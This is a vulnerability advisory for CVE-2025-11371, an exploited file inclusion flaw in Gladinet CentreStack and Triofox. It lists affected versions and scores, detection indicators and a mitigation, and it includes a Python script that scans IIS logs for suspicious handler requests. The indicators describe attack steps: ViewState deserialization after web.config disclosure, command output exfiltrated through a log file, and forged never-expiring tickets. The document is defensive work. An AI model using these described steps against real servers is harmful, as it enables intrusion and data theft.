CVE-2025-11371
published 2025-10-09


Priority: P1 · 91 · high · 7.5 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, due 2025-11-25
Exploited in the wild
EPSS: 92.09% (99.8th percentile)

In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: all versions prior to and including 16.7.10368.56560.

Affected

3 ranges

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gladinet | centrestack | < 16.10.10408.56683 | 16.10.10408.56683 |
| gladinet | centrestack_and_triofox | <= 16.7.10368.56560 | |
| gladinet | triofox | <= 16.7.10368.56560 | |

Detection & IOCs (extracted from sources)

  • Monitor IIS (w3wp.exe) for child processes running cmd.exe or PowerShell, which indicate post-exploitation via ViewState deserialization following LFI of web.config
  • Alert on Windows Application Event ID 1316, which captures ViewState deserialization attack payloads in the application event log
  • Detect an HTTP referrer from FOFA (https://en.fofa.info/) in web server logs preceding exploitation requests against Gladinet endpoints
  • Monitor for creation of or access to C:\programdata\CentreStac_log.txt, used by attackers to exfiltrate command output via the LFI endpoint
  • Alert on creation or execution of conqueror.exe in C:\Users\Public\ as a dropped-payload indicator
  • Detect requests to /storage/filesvr.dn with a 't' parameter containing a timestamp set to year 9999, indicating a crafted never-expiring access ticket exploiting the hardcoded AES key vulnerability
  • The LFI vulnerability (CVE-2025-11371) is exploitable only when the TempDownload handler (t.dn) is enabled in the UploadDownloadProxy Web.config. Disabling this handler mitigates the vulnerability until patching.
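
One way to run the FOFA-referrer and handler-request checks from the list above over IIS W3C logs, as an added example (not code from this page or from Gladinet). The sample log lines, the IP addresses, the `/placeholder-dir/` path and the 60-minute correlation window are constructed assumptions.

```python
from datetime import datetime

# Handler names come from the page; matching on the URI-stem suffix is an assumption.
WATCHED_SUFFIXES = ("/t.dn", "/filesvr.dn")
FOFA_MARKER = "fofa.info"

# Constructed sample in IIS W3C format (documentation IPs, placeholder values).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) cs(Referer) sc-status
2025-10-01 09:00:01 GET / - 203.0.113.10 Mozilla/5.0 https://en.fofa.info/ 200
2025-10-01 09:00:07 GET /storage/filesvr.dn t=placeholder 203.0.113.10 Mozilla/5.0 - 200
2025-10-01 09:05:00 GET /placeholder-dir/t.dn - 198.51.100.7 Mozilla/5.0 - 200
2025-10-01 09:06:00 GET / - 198.51.100.8 Mozilla/5.0 - 200
"""


def parse_w3c(text):
    """Yield one dict per request, taking column names from the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))


def find_suspects(text, window_minutes=60):
    """Return (client IP, URI stem, reason) for each request to a watched handler."""
    fofa_seen = {}  # client IP -> time of its most recent FOFA-referred request
    hits = []
    for row in parse_w3c(text):
        ts = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
        ip = row["c-ip"]
        if FOFA_MARKER in row.get("cs(Referer)", "-").lower():
            fofa_seen[ip] = ts
        stem = row["cs-uri-stem"].lower()
        if stem.endswith(WATCHED_SUFFIXES):
            prior = fofa_seen.get(ip)
            recent = prior is not None and (ts - prior).total_seconds() <= window_minutes * 60
            # Handler access alone can be normal traffic; the FOFA correlation raises priority.
            reason = "fofa-referer-then-handler" if recent else "handler-access"
            hits.append((ip, stem, reason))
    return hits


if __name__ == "__main__":
    for hit in find_suspects(SAMPLE_LOG):
        print(hit)
```

The `cs(Referer)` column is only present when referrer logging is enabled in the IIS W3C field selection; without it every hit falls back to `handler-access`.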

CVSS provenance

  • nvd: v3.1, 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • vulncheck: 7.5 HIGH
  • cisa: 7.5 HIGH